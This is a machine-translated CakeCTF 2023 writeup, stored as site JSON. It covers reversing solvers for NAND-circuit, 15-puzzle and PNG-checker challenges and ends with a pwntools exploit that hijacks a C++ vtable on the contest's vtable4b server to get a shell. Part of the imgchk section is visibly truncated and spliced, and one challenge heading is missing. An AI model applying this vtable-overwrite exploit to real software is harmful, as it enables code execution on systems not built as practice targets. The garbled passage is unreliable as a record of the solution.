{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-cakectf-2023-en","result":{"data":{"markdownRemark":{"id":"654d161d-1dff-5beb-8c71-b6cc2e2a98b5","html":"
\n

This page has been machine-translated from the original page.

\n
\n\n

Table of Contents

\n\n

I participated in CakeCTF 2023, which began on November 11, 2023, as a member of 0nePadding.

\n

I had been taking a break from CTFs for a while because I was busy writing Magical WinDbg - A casual guide to Windows dump analysis and troubleshooting -, which we were distributing for free at Tech Book Fest 15, so this was my first CTF in a while. (Shameless plug)

\n

I could barely solve any of the Rev challenges myself, but thanks to my teammates’ hard work we finished in 74th place overall.

\n

\n \n \n \n \n \n \n \n \n

\n

This time, I will briefly write up only the challenges we managed to solve.

\n

nande(Rev)

\n
\n

What makes NAND gates popular?

\n
\n

I loaded the provided PDB file for the challenge binary into Ghidra and analyzed the program.

\n

The decompiled result of the main function looked like this.

\n
int __cdecl main(int param_1,char **param_2)\n{\n  char *_Str;\n  size_t inputLength;\n  ulonglong j;\n  ulonglong i;\n  ulonglong k;\n  bool isCorrect;\n  \n  if (param_1 < 2) {\n    printf(s_Usage:_%s_<flag>_14001e100);\n  }\n  else {\n    _Str = param_2[1];\n    inputLength = strlen(_Str);\n    if (inputLength == 0x20) {\n      for (i = 0; i < 0x20; i = i + 1) {\n        for (j = 0; j < 8; j = j + 1) {\n          InputSequence[j + i * 8] = (byte)((int)_Str[i] >> ((byte)j & 0x1f)) & 1;\n        }\n      }\n      CIRCUIT(InputSequence,OutputSequence);\n      isCorrect = true;\n      for (k = 0; k < 0x100; k = k + 1) {\n        isCorrect = (bool)(isCorrect & OutputSequence[k] == AnswerSequence[k]);\n      }\n      if (isCorrect) {\n        puts(s_Correct!_14001e118);\n        return 0;\n      }\n    }\n    puts(s_Wrong..._14001e128);\n  }\n  return 1;\n}
\n

Reading this implementation, we can see that the 0x20-byte input is split into bits and stored in an array called InputSequence.

\n

Then the arrays InputSequence and OutputSequence are passed to the CIRCUIT function, after which the program checks whether OutputSequence matches AnswerSequence.

\n

From this, we can expect that when the input is the correct flag string, the OutputSequence generated by the CIRCUIT function will match the hard-coded AnswerSequence.

\n

So I looked at the decompiled result of the CIRCUIT function and obtained the following. (I have also included the MODULE and NAND functions called from CIRCUIT.)

\n
void __cdecl NAND(uchar param_1,uchar param_2,uchar *param_3)\n{\n  *param_3 = (param_1 & param_2) == 0;\n  return;\n}\n\nvoid __cdecl MODULE(uchar param_1,uchar param_2,uchar *param_3)\n{\n  undefined auStack_38 [32];\n  uchar n1;\n  uchar n2;\n  uchar n3 [6];\n  ulonglong local_10;\n  \n  local_10 = __security_cookie ^ (ulonglong)auStack_38;\n  NAND(param_1,param_2,&n1);\n  NAND(param_1,n1,n3);\n  NAND(param_2,n1,&n2);\n  NAND(n3[0],n2,param_3);\n  __security_check_cookie();\n  return;\n}\n\nvoid __cdecl CIRCUIT(uchar *Input,uchar *Output)\n{\n  ulonglong j;\n  ulonglong i;\n  \n  for (i = 0; i < 0x1234; i = i + 1) {\n    for (j = 0; j < 0xff; j = j + 1) {\n      MODULE(Input[j],Input[j + 1],Output + j);\n    }\n    MODULE(Input[j],'\\x01',Output + j);\n    memcpy();\n  }\n  return;\n}
\n

In the CIRCUIT function, after calling MODULE(Input[j],Input[j + 1],Output + j); 0xFF times and then executing MODULE(Input[j],'\\x01',Output + j);, it repeats the process of copying the generated OutputSequence array back into InputSequence 0x1234 times.

\n

In the MODULE function executed here, the program runs the NAND function multiple times using the values of the first and second arguments, then writes the result to the address given by the third argument.

\n

Reimplementing this processing in Python gives the following code.

\n
def MAKE_In(In,txt):\n    for i in range(0x20):\n        for j in range(0x8):\n            In[i*8+j] = ((ord(txt[i]) >> j) & 0x1f) & 1\n    return In\n\ndef COPYARR(In,Ou):\n    for i in range(0x100):\n        In[i] = Ou[i]\n    return In\n\ndef NAND(a, b):\n    if a & b == 1:\n        return 0\n    else:\n        return 1\n    \ndef MODULE(A,B):\n    n1,n2,n3 = (0,0,0)\n    n1 = NAND(A,B)\n    n3 = NAND(A,n1)\n    n2 = NAND(B,n1)\n    return NAND(n3,n2)\n\ndef CIRCUIT(In, Ou):\n    for i in range(0x1234):\n        for j in range(0xff):\n            Ou[j] = MODULE(In[j],In[j+1])\n        Ou[j+1] = MODULE(In[j+1],1)\n        In = COPYARR(In,Ou)\n    return In,Ou
\n

Based on the findings up to this point, we can see that it is possible to recover the flag by reversing the above processing with AnswerSequence as the argument.

\n

In the end, I was able to obtain the flag with the following solver.

\n
Ans = [ 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x01, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00 ]\n\ndef PRINT_FLAG(ARR):\n    flag = \"\"\n    for i in range(0x100//8):\n        b = \"0b\"\n        for j in range(8):\n            b += str(ARR[i*8+j])\n        flag += chr(int(b,2))\n    print(flag[::-1])\n    return\n\ndef COPYARR(In,Ou):\n    for i in range(0x100):\n        In[i] = Ou[i]\n    return In\n\ndef REV_MODULE(r,b):\n    if r == 0 and b == 1:\n        return 1\n    if r == 1 and b == 1:\n        return 0\n    if r == 0 and b == 0:\n        return 0\n    if r == 1 and b == 0:\n        return 1\n\ndef REV_CIRCUIT(Ans):\n    Ans = Ans[::-1]\n    Flag = [0 for i in range(0x100)]\n    for i in range(0x1234):\n        Flag[0] = REV_MODULE(Ans[0],1)\n        for j in range(1,0x100):\n            Flag[j] = REV_MODULE(Ans[j],Flag[j-1])\n        Ans = COPYARR(Ans,Flag)\n    return Flag\n\nFlag = REV_CIRCUIT(Ans)\nPRINT_FLAG(Flag)
\n

\n \n \n \n \n \n \n \n \n

\n

Cake Puzzle(Rev)

\n
\n

Someone cut a cake and scrambled.

\n
\n

When I decompiled the challenge binary’s main function in Ghidra, I obtained the following result.

\n
void main(void)\n{\n  int N;\n  char local_78 [112];\n  \n  alarm(1000);\n  while( true ) {\n    N = q();\n    if (N == 0) {\n      win();\n    }\n    printf(\"> \");\n    fflush(stdout);\n    N = __isoc99_scanf(\"%s\",local_78);\n    if (N == -1) break;\n    e((int)local_78[0]);\n  }\n                    /* WARNING: Subroutine does not return */\n  exit(0);\n}
\n

From this result, we can see that if the return value of the q function becomes 0, the win function is called and the flag can be obtained.

\n

The decompiled result of the q function looked like this.

\n

M points to a hard-coded 64-byte data region.

\n
undefined8 q(void)\n{\n  int i;\n  int n;\n  \n  n = 0;\n  do {\n    if (2 < n) {\n      return 0;\n    }\n    for (i = 0; i < 3; i = i + 1) {\n      if (*(int *)(M + ((long)n * 4 + (long)(i + 1)) * 4) <=\n          *(int *)(M + ((long)n * 4 + (long)i) * 4)) {\n        return 1;\n      }\n      if (*(int *)(M + ((long)(n + 1) * 4 + (long)i) * 4) <=\n          *(int *)(M + ((long)n * 4 + (long)i) * 4)) {\n        return 1;\n      }\n    }\n    n = n + 1;\n  } while( true );\n}
\n

It is hard to tell at a glance what this code is doing, so I rewrote it in Python to inspect it and found that it checks whether a condition like MArr[0] >= MArr[1] and MArr[1] >= MArr[2] and MArr[2] >= MArr[3] and MArr[4] >= MArr[5] ... is satisfied.

\n

In other words, it divides the 64-byte region M into 16 array elements of 8 bytes each and checks whether they are arranged in ascending order from the beginning.

\n

For reference, the hard-coded data region M converted into an array MArr was as follows.

\n
MArr  = [0x445856db,0x4c230304,0x0022449f,0x671a96b7,0x6c5644f7,0x7ff46287,0x6ee9c829,0x5cda2e72,0x00000000,0x698e88c9,0x33e65a4f,0x50cc5c54,0x1349831a,0x53c88f74,0x25858ab9,0x72f976d8]
\n

Based on this analysis, we can see that if we somehow rearrange the MArr array into ascending order, we can pass the check in q, reach the win function, and obtain the flag.

\n

Next, let’s trace the processing that can rewrite the contents of the data region M.

\n

The e function called by the program takes a 1-byte character entered by the user as an argument and performs the following processing.

\n
void e(char param_1)\n{\n  int a;\n  int b;\n  \n  s(&b,&a);\n  if (param_1 == 'U') {\n    if (b != 0) {\n      f(M + ((long)b * 4 + (long)a) * 4,M + ((long)(b + -1) * 4 + (long)a) * 4);\n    }\n  }\n  else if (param_1 < 'V') {\n    if (param_1 == 'R') {\n      if (a != 3) {\n        f(M + ((long)b * 4 + (long)a) * 4,M + ((long)b * 4 + (long)(a + 1)) * 4);\n      }\n    }\n    else if (param_1 < 'S') {\n      if (param_1 == 'D') {\n        if (b != 3) {\n          f(M + ((long)b * 4 + (long)a) * 4,M + ((long)(b + 1) * 4 + (long)a) * 4);\n        }\n      }\n      else if ((param_1 == 'L') && (a != 0)) {\n        f(M + ((long)b * 4 + (long)a) * 4,M + ((long)b * 4 + (long)(a + -1)) * 4);\n      }\n    }\n  }\n  return;\n}
\n

Here, it first determines the values of a and b with the s function.

\n

As shown below, the s function treats the data region M as an array divided into 8-byte chunks and returns the i and j values when it reaches the element whose value is 0.

\n
void s(int *param_1,int *param_2)\n{\n  int j;\n  int i;\n  \n  for (i = 0; i < 4; i = i + 1) {\n    for (j = 0; j < 4; j = j + 1) {\n      if (*(int *)(M + ((long)i * 4 + (long)j) * 4) == 0) {\n        *param_1 = i;\n        *param_2 = j;\n      }\n    }\n  }\n  return;\n}
\n

I did not notice it during the contest, but because it searches with i and j here, we can realize that the one-dimensional array M is being treated as a 16-cell plane.

\n

If we actually arrange MArr as a 4*4 grid of 16 cells, it looks like this.

\n
[0x445856db,0x4c230304,0x0022449f,0x671a96b7,\n 0x6c5644f7,0x7ff46287,0x6ee9c829,0x5cda2e72,\n 0x00000000,0x698e88c9,0x33e65a4f,0x50cc5c54,\n 0x1349831a,0x53c88f74,0x25858ab9,0x72f976d8]
\n

If we further convert that into the rank order of the values in the cells, we get the following.

\n
04 05 01 09\n11 14 12 08\n00 10 03 06\n02 07 15 13
\n

In other words, when M is in its initial state, the s function returns i=2, j=0.

\n

Next, let’s continue tracing the rest of the processing in the e function.

\n

Since it is a bit hard to read, let’s look at the following Python rewrite.

\n
b,a = s(b,a)\n\nbase = (b*4+a)\nU = (b-1)*4+a\nR = b*4+(a+1)\nD = (b+1)*4+a\nL = b*4+(a-1)\n\nif b != 0:\n    s_swap(base,U)\n\nif a != 3:\n    s_swap(base,R)\n\nif b != 3:\n    s_swap(base,D)\n\nif a != 0:\n    s_swap(base,L)
\n

The four available operation characters are U, R, D, and L.

\n

Depending on which character is specified, the value in array M pointed to by index base (the element whose value is 0x0) is swapped with the value at another index.

\n

Again, the important point is to notice the meaning: U, R, D, and L stand for Up, Right, Down, and Left, respectively.

\n

Also, the restrictions for using each command, such as b != 0 and a != 3, are there to prevent moves from going outside the 16-cell board.

\n

From this analysis, we can see that the challenge is a puzzle in which the following 16 cells must be rearranged in ascending order.

\n
04 05 01 09\n11 14 12 08\n00 10 03 06\n02 07 15 13
\n

This type of puzzle is apparently called the 15-puzzle.

\n

Algorithms for solving the 15-puzzle are described on sites like the one below, and it seems that you can solve it efficiently by alternately placing the correct cells in the top row and the rightmost column.

\n

Reference: How to Solve the 15 Puzzle : 12 Steps - Instructables

\n

The 15-puzzle seems to be a classic shortest-path search problem tackled with breadth-first search, and various solvers were available on the internet.

\n

This time, I slightly customized a solver downloadable from the following site and used it to solve the challenge.

\n

Reference: Solving the 8-Puzzle and 15-Puzzle in Python 3: Shortest-Path Search with the A* (A-Star) Algorithm

\n

Running the solver downloaded above lets us obtain the state transitions along the shortest path as shown below.

\n

\n \n \n \n \n \n \n \n \n

\n

I modified the code slightly as follows so that I could see the panel moves for the shortest path found by this solver.

\n
if __name__ == '__main__':\n    sol, visit = main()\n    ans = \"\"\n    state = (0,2)\n    from pprint import pprint\n    for s in sol:\n        # print(s)\n        i,j = (0xF,0xF)\n        for i in range(4):\n            for j in range(4):\n                if s[(i*4 + j)] == 0:\n                    p1 = i\n                    p2 = j\n        if p1 != state[1]:\n            if state[1] - p1 == 1:\n                ans += \"U\"\n            elif state[1] - p1 == -1:\n                ans += \"D\"\n        if p2 != state[0]:\n            if state[0] - p2 == 1:\n                ans += \"L\"\n            elif state[0] - p2 == -1:\n                ans += \"R\"\n        state = (p2,p1)\n    print(ans)\n\n# URRDLLURURDRULLDRRDLLDLUURDDRRULULDRDLLURRULURDRDDLLULURRDRULLLU
\n

Running this solver identifies URRDLLURURDRULLDRRDLLDLUURDDRRULULDRDLLURRULURDRDDLLULURRDRULLLU as the instruction sequence needed to solve the puzzle.

\n

Therefore, by sending this command sequence to the challenge server with the following script, I was able to obtain the correct flag.

\n
from pwn import *\n\nCONTEXT = \"debug\"\ncontext.log_level = CONTEXT\n\ntarget = remote(\"others.2023.cakectf.com\", 14001)\nans = \"URRDLLURURDRULLDRRDLLDLUURDDRRULULDRDLLURRULURDRDDLLULURRDRULLLU\"\nfor i in range(len(ans)):\n    target.recvuntil(b\"> \")\n    target.sendline(ans[i].encode())\n\ntarget.clean()\ntarget.interactive()
\n

\n \n \n \n \n \n \n \n \n

\n

Update: imgchk(Rev)

\n
\n

Ordinal flag checker but not for text.

\n
\n

When the challenge binary is decompiled in Ghidra, we can see that it is a program that takes the file path of flag.png from the command-line arguments and validates it with the check_flag function.

\n
undefined8 main(int param_1,undefined8 *param_2)\n{\n  int iVar1;\n  undefined8 uVar2;\n  \n  if (param_1 == 2) {\n    iVar1 = check_flag(param_2[1]);\n    if (iVar1 == 0) {\n      puts(\"Correct!\");\n    }\n    else {\n      puts(\"Wrong...\");\n    }\n    uVar2 = 0;\n  }\n  else {\n    printf(\"Usage: %s <flag.png>\\n\",*param_2);\n    uVar2 = 1;\n  }\n  return uVar2;\n}
\n

So I tried looking at the check_flag function, but no decompiled result was displayed.

\n

\n \n \n \n \n \n \n \n \n

\n

Just from the function names, we can guess that after performing several operations on the PNG file given as a command-line argument, the program hashes some value with MD5 and compares it.

\n

I checked the functions one by one.

\n

The first function called, png_create_read_struct, is a library function that initializes the png_struct structure.

\n

The following png_create_info_struct is also a library function that initializes the png_info structure.

\n

Reference: pngcreateread_struct

\n

Reference: pngcreateinfo_struct

\n

The next functions, png_set_longjmp_fn and _setjmp, appear to be library functions that define the longjmp used for exception handling when an error occurs while reading or writing PNG data.

\n

Reference: PNG Image Input and Output - Image File I/O - Hekiiro Kobo

\n

In addition, png_init_io and png_read_info are also library functions that read PNG file data into memory.

\n

Reference: pnginitio

\n

Reference: pngreadimage

\n

By this point the rough idea is clear: even after png_read_info, libpng library functions continue to be used until the call to png_read_image.

\n

If we reimplement the overall flow up to this point in C, it looks like this.

\n
// gcc read_png.c -lpng\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <png.h>\n\nvoid read_png_file(const char *filename) {\n    FILE *fp = fopen(filename, \"rb\");\n    if (!fp) abort();\n\n    png_structp png = png_create_read_struct(PNG_LIBPNG_VER_STRING, NULL, NULL, NULL);\n    if (!png) abort();\n\n    png_infop info = png_create_info_struct(png);\n    if (!info) abort();\n\n    if (setjmp(png_jmpbuf(png))) abort();\n\n    png_init_io(png, fp);\n    png_read_info(png, info);\n\n    int width = png_get_image_width(png, info);\n    int height = png_get_image_height(png, info);\n    png_byte color_type = png_get_color_type(png, info);\n    png_byte bit_depth = png_get_bit_depth(png, info);\n\n    printf(\"Width: %d, Height: %d\\n\", width, height);\n    printf(\"Color type: %d, Bit depth: %d\\n\", color_type, bit_depth);\n\n    size_t row_bytes = png_get_rowbytes(png, info);\n    printf(\"Row bytes: %zu\\n\", row_bytes);\n\n    fclose(fp);\n}\n\nint main(int argc, char *argv[]) {\n    if (argc != 2) {\n        fprintf(stderr, \"Usage: %s <file.png>\\n\", argv[0]);\n        return 1;\n    }\n\n    const char *filename = argv[1];\n    read_png_file(filename);\n\n    return 0;\n}
\n

Running this lets us obtain information about the target PNG file.

\n

\n \n \n \n \n \n \n \n \n

\n

Using this PNG file lets us pass all of the checks, so execution can proceed to the processing after Cake160.

\n

After that, it loops width times and compares the MD5 hash of some value against the hard-coded byte sequence in answer with memcmp.

\n

\n \n \n \n \n \n \n \n \n

\n

I could tell that the processing in this loop takes place after obtaining data from the destination address specified by the second argument to the png_read_image function, but the logic was so detailed that I could not fully read through it.

\n

\n \n \n \n \n \n \n \n \n

\n

However, immediately after this loop, the address of the string passed as the first argument to the MD5 function matches the address where values are stored inside this loop.

\n

\n \n \n \n \n \n \n \n \n

\n

When I performed dynamic analysis around this part, I found that when I supplied an image whose pixels were all white, the 3 bytes passed to the MD5 function became 0x0FFFFF.

\n

\n \n \n \n \n \n \n \n \n

\n

On the other hand, when I supplied an image whose pixels were all black, this value became 0x000000.

\n

From these observations, we can see that this program takes some value obtained from the image as a 3-byte input to the MD5 hash function.

\n

In fact, the result of hashing 0x0FFFFF on the binary side matches the result obtained by Python’s hashlib.md5(b\"\\xff\\xff\\x0f\").hexdigest().

\n

\n \n \n \n \n \n \n \n \n

\n

Because some value obtained from the image data in this 0x14-iteration loop is treated as 3 bytes of data, it seems possible that the program takes 0x14 bits worth of pixels from the image and leaves 4 bits as null.

\n

To verify this, I generated an image whose pixels alternate between black and white with the following script and performed dynamic analysis.

\n
import random\nfrom PIL import Image\n\ndef get_pixel_data(image_path):\n    image = Image.open(image_path)\n    image = image.convert('L')\n    pixel_data = list(image.getdata())\n    width, height = image.size\n    pixel_data_2d = [pixel_data[i * width:(i + 1) * width] for i in range(height)]\n    return pixel_data_2d\n\nwidth, height = 0x1e0, 0x14\nmode = \"1\"\nimage = Image.new(mode, (width, height))\n\ndata = []\nfor i in range(height):\n    for j in range(width):\n        if j % 2 == 0:\n            data.append(1)\n        else:\n            data.append(0)\n\nprint(data)\nimage.putdata(data)\nimage.save(\"flag.png\")\n\npixels = get_pixel_data(\"flag.png\")\nfor pixel in pixels:\n    print(pixel)
\n

The image generated here becomes vertical black-and-white stripes as shown below.

\n

\n \n {i:#020b}'[2:])\n\n\nfrom PIL import Image\nwidth, height = 0x1e0, 0x14\nmode = \"1\"\nimage = Image.new(mode, (width, height))\ndata = [0 for i in range(0x14*0x1e0)]\n\nfor i in range(0x1e0):\n l = line[i]\n for j in range(0x14):\n if l[j] == \"1\":\n data[480*(0x13-j) + i] = 1\n else:\n data[480*(0x13-j) + i] = 0\n\nimage.putdata(data)\nimage.save(\"flag.png\")\n

Running this solver generates an image containing the correct flag, as shown below.

\n

\n \n \n \n \n \n \n \n \n

\n

It seems that we need to compromise the following class.

\n
class Cowsay {\n    public:\n        Cowsay(char *message) : message_(message) {}\n        char*& message() { return message_; }\n        virtual void dialogue();\n\n    private:\n        char *message_;\n};
\n

This class named Cowsay contains a virtual method called dialogue(); and a private member called *message_;.

\n

Using Use cowsay from menu option 1 lets us call the dialogue(); method, and using Change message seems to let us modify the value of *message_;.

\n

dialogue(); is declared as a virtual function.

\n

Roughly speaking, a C++ virtual function is a function that can be overridden by defining a method with the same name in a subclass.

\n

Reference: Learn the Basics of C++ in One Week | Day 6: virtual and virtual functions

\n

For example, if you compile and run the following code, it outputs Child-virtual and Original-nomal.

\n
#include <iostream>\n#include <string>\n \nusing namespace std;\n \nclass CBase{\npublic:\n    virtual void ov(){ cout << "Original-virtual" << endl; }\n    void on(){ cout << "Original-nomal" << endl; }\n};\n\nclass CChild : public CBase {\npublic:\n    void ov(){ cout << "Child-virtual" << endl; }\n    void on(){ cout << "Child-nomal" << endl; }\n};\n \nint main(){\n    CChild* a;\n    a = new CChild();\n    a->ov();\n    a->on();\n    return 0;\n}
\n

If you look at the disassembly of this code, something interesting appears: the ov function declared as a virtual function is called via an address obtained from the CChild class object stored on the stack, whereas the non-overridable on function defined in the parent class is called directly by address.

\n

\n \n \n \n \n \n \n \n \n

\n

In Ghidra’s decompiled output, it looked like this.

\n

\n \n \n \n \n \n \n \n \n

\n

Although the ov function and the on function are defined in much the same way, the difference is that only the on function has its virtual address called directly.

\n

\n \n \n \n \n \n \n \n \n

\n

From these observations, we can see that in this challenge as well, the call address of the dialogue function, which is defined as a virtual function, is stored inside the Cowsay class object, and by overwriting it we should be able to call the win function and obtain the flag.

\n

\n \n \n \n \n \n \n \n \n

\n

Once we understand that much, all that remains is to adjust the byte size appropriately, send in the payload, and obtain a shell and the flag.

\n
from pwn import *\n\ncontext.log_level = \"debug\"\n\ntarget = remote(\"vtable4b.2023.cakectf.com\", 9000)\ntarget.recvuntil(b\"win> = \")\nwin_addr = int(target.recvline(),16)\ninfo(\"win_addr: %#x\" ,win_addr )\n\n\ntarget.sendline(b\"3\")\ntarget.recvuntil(b\" [ address ]    [ heap data ]\")\ntarget.recvlinesS(6)\nheap_addr = int(target.recvline()[:14],16)\ninfo(\"heap: %#x\" ,heap_addr )\n\ntarget.sendline(b\"1\")\ntarget.recvuntil(b\"[+] You're trying to use vtable at \")\nvtable_addr = int(target.recvline(),16)\ninfo(\"vtable_addr: %#x\" ,vtable_addr )\n\npayload = b\"\"\npayload += p64(win_addr)\npayload += b\"\\x41\"*24\npayload += p64(heap_addr)\n\ntarget.sendline(b\"2\")\ntarget.sendlineafter(b\"Message:\",payload)\n\ntarget.sendline(b\"3\")\ntarget.sendline(b\"1\")\n\ntarget.interactive()
\n

\n \n \n \n \n \n \n \n \n

\n

Reference: Magical WinDbg - A casual guide to Windows dump analysis and troubleshooting -: Kaeru no Hondana

","fields":{"slug":"/ctf-cakectf-2023-en","tagSlugs":["/tag/ctf-en/","/tag/rev-en/","/tag/english/"]},"frontmatter":{"date":"2023-11-12","description":"Writeup for Cake CTF 2023.","tags":["CTF (en)","Rev (en)","English"],"title":"Cake CTF 2023 Writeup","socialImage":{"publicURL":"/static/ec6175c6798bb9e1fd1b91a25d0214df/ctf-cakectf-2023.png"}}}},"pageContext":{"slug":"/ctf-cakectf-2023-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}